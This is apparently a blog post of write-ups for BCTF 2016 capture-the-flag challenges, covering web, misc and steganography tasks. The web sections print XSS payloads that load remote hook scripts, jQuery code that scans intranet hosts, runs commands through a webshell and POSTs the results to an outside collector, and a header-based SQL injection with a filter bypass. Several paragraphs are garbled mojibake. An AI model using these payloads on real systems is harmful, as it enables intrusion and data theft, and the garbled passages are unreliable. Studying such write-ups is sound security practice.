LoRexxar's Blog

bctf2016

2016/03/22

I played bctf2016 the other day, and even at the end I still hadn't figured out the approach to the web challenges; on top of that, out of 20-odd challenges only 2 were web, orz. Really no way for web dogs to survive; web dogs have to switch to misc these days…

web

qaq (iframe tag cross-origin + CORS intranet)

hint1: What else can XSS do? Just steal cookies? Secret in intranet, hack harder guys!
hint2: CORS headers

The only writeup I can find right now is one by a foreign team, found via ctftime: https://github.com/raccoons-team/ctf/tree/master/2016-03-19-bctf/web-350-QAQ

Opening the challenge, the first thing you see is a big message board, so there is basically nothing else to it; let's try to bypass the XSS filter first.

After a bit of testing, all the common tags were filtered; only <iframe> and <link> remained.

The link tag can only be used for CSRF, so it has to be the iframe tag.

What I used myself was the conventional invocation:

<iframe src="http://youdomain/xxx.php">

Writing a <script> into the PHP file lets you execute whatever JS you need.

The foreign team instead used the iframe's onload attribute (if I remember correctly, this gets intercepted by Chrome's filter)…

<iframe onload='
var sc = document.createElement("scr" + "ipt");
sc.type = "text/javascr" + "ipt";
sc.src = "http://1.2.3.4/js/hook.js";
document.body.appendChild(sc);
'
/>

With the code above, DOM XSS successfully created:

<script type="text/javascript" src="http://1.2.3.4/js/hook.js"></script>

This way arbitrary JS can be executed; after we submit, the admin comes along later and reviews it.

The foreign team above used the BeEF framework's hook.js to talk to their server, and found that the connection dropped after roughly 5 seconds.

棰樼洰绗竴涓彁绀哄憡璇夋垜浠瀵嗗湪鍐呯綉涓紝閭d箞鎴戜滑闇瑕佹壂涓涓媓ost锛屼粠beEF涓紝鎴戜滑鍙互鐪嬪埌

127.0.0.1 localhost Linux
172.17.0.1 Linux
192.168.1.3 Linux

Then check the neighbouring IPs of those hosts; here the foreign team used jQuery requests:

jQuery.get( "http://192.168.1.1", function( data ) {
jQuery.post( "http://1.2.3.4/app_dev.php", { x: "192.168.1.1"} );
});
jQuery.get( "http://192.168.1.2", function( data ) {
jQuery.post( "http://1.2.3.4/app_dev.php", { x: "192.168.1.2"} );
});
jQuery.get( "http://192.168.1.3", function( data ) {
jQuery.post( "http://1.2.3.4/app_dev.php", { x: "192.168.1.3"} );
});
jQuery.get( "http://192.168.1.4", function( data ) {
jQuery.post( "http://1.2.3.4/app_dev.php", { x: "192.168.1.4"} );
});
jQuery.get( "http://192.168.1.5", function( data ) {
jQuery.post( "http://1.2.3.4/app_dev.php", { x: "192.168.1.5"} );
});
jQuery.get( "http://172.17.0.1", function( data ) {
jQuery.post( "http://1.2.3.4/app_dev.php", { x: "172.17.0.1"} );
});
jQuery.get( "http://172.17.0.2", function( data ) {
jQuery.post( "http://1.2.3.4/app_dev.php", { x: "172.17.0.2"} );
});
jQuery.get( "http://172.17.0.3", function( data ) {
jQuery.post( "http://1.2.3.4/app_dev.php", { x: "172.17.0.3"} );
});
jQuery.get( "http://172.17.0.4", function( data ) {
jQuery.post( "http://1.2.3.4/app_dev.php", { x: "172.17.0.4"} );
});
jQuery.get( "http://172.17.0.5", function( data ) {
jQuery.post( "http://1.2.3.4/app_dev.php", { x: "172.17.0.5"} );
});

http://1.2.3.4/app_dev.php is written like this:

<?php
// Append whatever the hooked browser POSTs as "x" to a local log file
$file = fopen("file.txt", "a");
fwrite($file, "\n\n\n". $_POST['x']);
fclose($file);   // the original closed $myfile, a handle that was never opened

Testing showed that 172.17.0.2 exists.

So first request 172.17.0.2 and see what happens; it returned:

<html>
<body>
=.=
webdog
webshell
=.=
<!--
header("Access-Control-Allow-Origin: *");
$ztz= 'system';
ob_start($ztz);
echo $_GET[c];
ob_end_flush();
or
$ztz = new ReflectionFunction("system");
echo $ztz->invokeArgs(array("$_GET[c]"));
-->
</body>
</html>

There is a PHP shell that takes commands via $_GET[c];
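As an added example (not part of the writeup), a simplified model of the browser's CORS response check for a simple GET: it shows why script injected into the message board could read the body from 172.17.0.2, which answers with `Access-Control-Allow-Origin: *`, while a host without that header stays opaque even when it is up. The header sets below are constructed; preflights, Vary and the "null" origin are out of scope.

```python
# Added example (not from the writeup): a simplified model of the browser's CORS
# response check for a simple GET. Real browsers also handle preflights, Vary
# and the "null" origin; those are left out here.

def cors_response_readable(page_origin, response_headers, with_credentials=False):
    """True if a page on `page_origin` may read this cross-origin response."""
    headers = {k.lower(): v.strip() for k, v in response_headers.items()}
    allow_origin = headers.get("access-control-allow-origin")
    if allow_origin is None:
        return False                 # no CORS header: the response is opaque to script
    if allow_origin == "*":
        return not with_credentials  # the wildcard is refused for credentialed requests
    if allow_origin != page_origin:
        return False                 # otherwise it must match the requesting origin exactly
    if with_credentials:
        return headers.get("access-control-allow-credentials") == "true"
    return True

# Constructed header sets, not captured from the challenge network.
WEBSHELL_HOST = {"Content-Type": "text/html", "Access-Control-Allow-Origin": "*"}
PLAIN_HOST = {"Content-Type": "text/html"}

def reachable_hosts(page_origin, hosts):
    """Mirror the writeup's scan loop: the jQuery.get success callback (and so the
    POST back to the collector) only fires for hosts whose response is readable."""
    return [host for host, hdrs in hosts.items()
            if cors_response_readable(page_origin, hdrs)]
```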

So run ls and you find:

fl4g
index.php
index.php

The flag is there, so cat it:

jQuery.get( "http://172.17.0.2/?c=cat fl4g", function( data ) {
jQuery.post( "http://1.2.3.4/app_dev.php", { x: data} );
});

get!

homework

I searched for a while without finding a writeup, only one written by a friend, and that was a version that hadn't got the flag yet; still, a lot can be learned from it.

http://www.isecer.com/ctf/bctf-2016-log-for-homework.html

1. hint1: source code can be leaked.
2. hint2: version control
3. hint3: hack the server

First, a big pitfall: the hints say there is source leakage plus version control, so the first reaction is .git, but there was none. Later I remembered that when downloading a foreigner's githack tool earlier I had seen source-ripping tools for several other version-control systems; opening that up, there really is one that rips .hg.

https://github.com/kost/dvcs-ripper

It turned out /index.php and /admin/read.php might be vulnerable.

index.php has a filter function:

function stripStr($str) {
    $str=str_ireplace("'","",$str);
    $str=str_ireplace('"',"",$str);
    $str=str_ireplace('&',"",$str);
    $str=str_ireplace('#',"",$str);
    $str=str_ireplace(';',"",$str);
    $str=str_ireplace(',',"",$str);
    $str=str_ireplace(':',"",$str);
    $str=str_ireplace('`',"",$str);
    $str=str_ireplace('(',"",$str);
    $str=str_ireplace(')',"",$str);
    $str=str_ireplace('[',"",$str);
    $str=str_ireplace(']',"",$str);
    $str=str_ireplace('\\',"",$str);
    // In single quotes '\r', '\n' and '\0' are two-character literals (backslash + letter),
    // not CR/LF/NUL, and every backslash was already removed on the line above
    $str=str_ireplace('\r',"",$str);
    $str=str_ireplace('\n',"",$str);
    $str=str_ireplace('\0',"",$str);
    // Each token is removed repeatedly until none is left, but one token at a time, in this order
    do $str=str_ireplace("script","",$str,$count); while($count>0);
    do $str=str_ireplace("iframe","",$str,$count); while($count>0);
    do $str=str_ireplace("data","",$str,$count); while($count>0);
    do $str=str_ireplace("\\x","",$str,$count); while($count>0);
    do $str=str_ireplace("\\u","",$str,$count); while($count>0);
    return $str;
}

In read.php, get_ip has a hole:

$ip=get_client_ip();
function get_client_ip(){
    if (getenv("HTTP_CLIENT_IP") && strcasecmp(getenv("HTTP_CLIENT_IP"), "unknown")){
        $ip = getenv("HTTP_CLIENT_IP");
    }else if (getenv("HTTP_X_FORWARDED_FOR") && strcasecmp(getenv("HTTP_X_FORWARDED_FOR"), "unknown")){
        $ip = getenv("HTTP_X_FORWARDED_FOR");
    }else if (getenv("REMOTE_ADDR") && strcasecmp(getenv("REMOTE_ADDR"), "unknown")){
        $ip = getenv("REMOTE_ADDR");
    }else if (isset($_SERVER['REMOTE_ADDR']) && $_SERVER['REMOTE_ADDR'] && strcasecmp($_SERVER['REMOTE_ADDR'], "unknown")){
        $ip = $_SERVER['REMOTE_ADDR'];
    }else{
        $ip = "unknown";
    }
    return($ip);
}
$sql = "UPDATE `test`.`message` SET `is_read` = '1', `operation_log_ip` ='".
$ip."', `operation_log_ua` ='".ua."' WHERE `message`.`index` = '".$_GET['index']."';";
query($sql);

After injecting, it turned out the password couldn't be cracked, so XSS is still needed:

<scrdataipt src//xxx.com/xss.js.php></scrdataipt>
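To make the point of the scrdataipt trick concrete, here is an added example (not the challenge's code): a Python port of the stripStr() filter from index.php, which removes each token in its own loop one token after another, beside a fixed-point variant that re-runs the whole pass until the input stops changing. The function names and the sample inputs are my own.

```python
import re

# Added example (not the challenge's code): Python port of the page's stripStr()
# next to a fixed-point variant that closes the ordering gap.

SINGLE_CHARS = ["'", '"', '&', '#', ';', ',', ':', '`', '(', ')', '[', ']', '\\']
# Each token is removed case-insensitively. "\\x" / "\\u" can never match here:
# the backslash was already stripped by SINGLE_CHARS, exactly as in the PHP.
TOKENS = ["script", "iframe", "data", "\\x", "\\u"]

def strip_str_page(s):
    """Mirror of stripStr(): one do/while loop per token, run one after another."""
    for ch in SINGLE_CHARS:
        s = s.replace(ch, "")
    for tok in TOKENS:
        pattern = re.compile(re.escape(tok), re.IGNORECASE)
        while True:                      # PHP: do ... while ($count > 0)
            s, count = pattern.subn("", s)
            if count == 0:
                break
    return s

def strip_str_fixpoint(s):
    """Hardened variant: repeat the whole pass until nothing changes, so a token
    that only appears after a later token was removed is caught on the next pass."""
    while True:
        stripped = strip_str_page(s)
        if stripped == s:
            return s
        s = stripped
```

Nesting the same token ("scriscriptpt") is handled by the page's loop, but a token assembled by removing a token that comes later in the list survives one pass; the fixed-point version removes it.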

The JS is pretty free-form; it can be written like this:

xhr=new XMLHttpRequest();
xhr.open("POST","http://104.199.137.82/admin/read.php?index=<?=$i?>",false);
xhr.setRequestHeader("X-Forwarded-For","<?=$p?>");
xhr.send();
r=xhr.responseText;
xhr.open("POST","http://xxx.com/get.php",true);
xhr.send("v="+escape(escape(r)))

One problem: once the admin has viewed you, the message is marked is_read and you can no longer inject.. so a script is necessary.

misc

hsab (sha collision)

The challenge has two pitfalls. First you have to brute-force a string that contains the given value and whose hash starts with 20 zero bits; a teammate wrote a script:

#!/usr/bin/env python3
# -*- coding: utf-8 -*-
from pwn import *
import hashlib
import re
import itertools
import string

rand_string = string.ascii_letters + "0123456789"
e2 = itertools.permutations(rand_string, 10)

def fuck_1(s):
    # Try 10-character suffixes until sha256(s + suffix) starts with 20 zero bits
    while True:
        try:
            e3 = next(e2)
        except StopIteration:
            exit(-1)
        ns = s + "".join(e3)
        sha = hashlib.sha256(ns.encode()).hexdigest()
        sha_bin = bin(int(sha, 16))[2:]
        sha_bin = '0' * (256 - len(sha_bin)) + sha_bin   # left-pad to the full 256 bits
        if sha_bin[:20] == "00000000000000000000":
            return ns

def main():
    #context.log_level = "debug"
    #conn = remote("104.199.132.199", 2223)
    conn = remote("104.199.132.199", 2222)
    #st = "rnwgqhnz"
    #print(fuck_1(st))
    str1 = conn.recvuntil(b"zeros.").decode()
    print(str1)
    st = re.findall(r"'(.+?)'", str1)[0]   # the prefix the server quotes in its prompt
    pt1 = fuck_1(st)
    conn.send((pt1 + "\n").encode())
    conn.sendline(b"pwd")
    conn.interactive()

if __name__ == '__main__':
    main()

After getting in, I found only shell builtins remained, which left me completely baffled; so let's test: first, echo can list a directory:

echo /home/ctf/*

That lists every file under ctf, and flag.ray turned up, but after a long time testing I couldn't find a way to read the file.
Later, reading writeups, I found there are many ways to read a file.

绗竴绉嶅ソ鍍忔槸瀹樻柟鍋氭硶

dlcall -n fd -r pointer open /home/ctf/flag.ray 0 && dlcall -n mapped -r pointer mmap 0 10 1 1 \$fd 0 && dlcall printf %s \$mapped

I didn't really understand it.

Later I found other commands could be used:

bash -v /home/ctf/flag.ray
history -r /home/ctf/flag.ray history

Outskilled; I concede.

catvideo (ffmpeg filter)

棰樼洰鏄釜姣旇緝澶х殑video锛屽湪windows涓嬪ソ鍍忔槸鎵撲笉寮鐨勶紝鍦╨inux涓嬪彲浠ョ湅鍒板緢澶氬緢澶氱殑闆姳锛屽綋鏃舵病浠涔堟兂娉曪紝鍚庢潵鐪嬪埌鍑犵瘒writeup锛岃櫧鐒跺鐜版垚鍔熶簡锛屼絾鏄病鏈夊緢寮勬槑鐧芥槸鎬庝箞鍥炰簨銆

http://countersite.org/articles/steganography/68-bctf-2016-stego-catvideo.html#sel=18:7,18:7

http://fadec0d3.blogspot.jp/

http://err0r-451.ru/2016-bctf-forensic-catvideo-150-pts/

Although the solvers explain it differently, the method is the same: use ffmpeg to split the video into frames, then XOR them, and some images become visible.

棣栧厛鏄敤ffmpeg鎶婅棰戞媶鍒

ffmpeg.exe -i catvideo-497570b7e2811eb52dd75bac9839f19d7bca5ef4.mp4 -r 30.0 fr_%4d.bmp

There are quite a few parameters; there is some documentation for them.

鎴嚭浜1000澶氬浘鐗囷紝閭e啓涓剼鏈瘮杈冨樊寮傚惂銆

from PIL import Image
from PIL import ImageChops
import glob
import os

os.makedirs("frames_new", exist_ok=True)   # output directory for the difference frames
im0 = Image.open("fr_0001.bmp")            # reference frame every other frame is compared against
for frame in glob.glob("./frames/*"):
    # Per-pixel difference against the reference frame; whatever changed stands out
    ImageChops.subtract(Image.open(frame), im0).save(frame.replace("frames", "frames_new"))

It produced a lot of images; although blurry, the flag could be seen...

I don't really understand Python's ImageChops; I only found partial documentation.

midifan (MIDI LSB steganography)

Reproducing this challenge took a long time: there was no complete writeup online, only a script, and I spent ages trying to reproduce it. Today I finally got the flag, but I'm still not familiar with the MIDI format.

When I did the challenge earlier I used the pymidi module, but after a long time still couldn't get the flag; only after running someone else's script did I understand what was going on.

First, to process MIDI music, convert the data to CSV to get the complete contents.
Here I used this: http://www.fourmilab.ch/webtools/midicsv/, run from the command line:

midicsv.exe midifan.mid xxx.csv

That gives the complete CSV; then it's time to write a script.

import binascii

# Each row of the midicsv output is "Track, Time, Type, Channel, Note, Velocity"
d = open("xxx.csv").read().split("\n")
bits = ""
for x in d:
    r = x.split(", ")
    if len(r) > 4:
        if r[2] == "Note_on_c":          # only Note_on events carry the hidden bits
            if int(r[3]) == 0:           # channel 0 only
                bits += str(int(r[1]) % 2)   # parity of the Time field is one bit
# Reverse the bit string, pack it into bytes, then reverse the bytes again
n = int(bits[::-1], 2)
print(binascii.hexlify(n.to_bytes((n.bit_length() + 7) // 8, "big")[::-1]).decode())
print(n.to_bytes((n.bit_length() + 7) // 8, "big")[::-1].decode())

The script above reads the channel 0 data, filters out the Note_on_c events, and from each event's Time value takes 1 for odd and 0 for even; then reverse the bits, convert to hex, unhexlify, and reverse again to get the flag:

BCTF{ju6t_0ne_b1t_of_d1FF}
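As an added example (not the writeup's script), the same LSB extraction written so the bit order is explicit: bits are taken from the Time parity of channel-0 Note_on_c rows and packed eight per byte, least significant bit first, which is exactly what the reverse / hex / reverse trick above produces. The CSV rows are constructed here, not taken from midifan.mid.

```python
# Added example (not the writeup's script): decode the midicsv LSB channel with
# explicit byte packing instead of the reverse / hex / reverse trick.

def extract_lsb_bits(csv_lines, channel=0):
    """Parity of the Time field of every Note_on_c event on `channel`.

    midicsv rows look like: Track, Time, Type, Channel, Note, Velocity
    """
    bits = []
    for line in csv_lines:
        fields = [f.strip() for f in line.split(",")]
        if len(fields) < 5:             # Start_track / End_track rows are shorter
            continue
        time, event, chan = fields[1], fields[2], fields[3]
        if event == "Note_on_c" and chan == str(channel):
            bits.append(int(time) % 2)  # odd time -> 1, even time -> 0
    return bits

def bits_to_text(bits):
    """Pack 8 bits per byte, least significant bit first (the order produced by the
    writeup's int(bits[::-1], 2) followed by a byte reversal)."""
    out = bytearray()
    for i in range(0, len(bits) - len(bits) % 8, 8):
        byte = 0
        for j, bit in enumerate(bits[i:i + 8]):
            byte |= bit << j
        out.append(byte)
    return out.decode("ascii", errors="replace")

def decode_midicsv(csv_lines, channel=0):
    return bits_to_text(extract_lsb_bits(csv_lines, channel))

# Constructed sample (not the challenge's midifan.mid): the parity of the channel-0
# Note_on_c times spells "OK"; the Note_off_c and channel-1 rows must be ignored.
NOTE_TIMES = [101, 201, 301, 401, 500, 600, 701, 800,        # 'O' = 0x4F, LSB first
              901, 1001, 1100, 1201, 1300, 1400, 1501, 1600]  # 'K' = 0x4B, LSB first
SAMPLE_CSV = (["0, 0, Header, 1, 2, 480", "1, 0, Start_track",
               "1, 150, Note_off_c, 0, 60, 0", "1, 250, Note_on_c, 1, 62, 80"]
              + ["1, %d, Note_on_c, 0, 60, 80" % t for t in NOTE_TIMES]
              + ["1, 1700, End_track"])

if __name__ == "__main__":
    print(decode_midicsv(SAMPLE_CSV))
```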
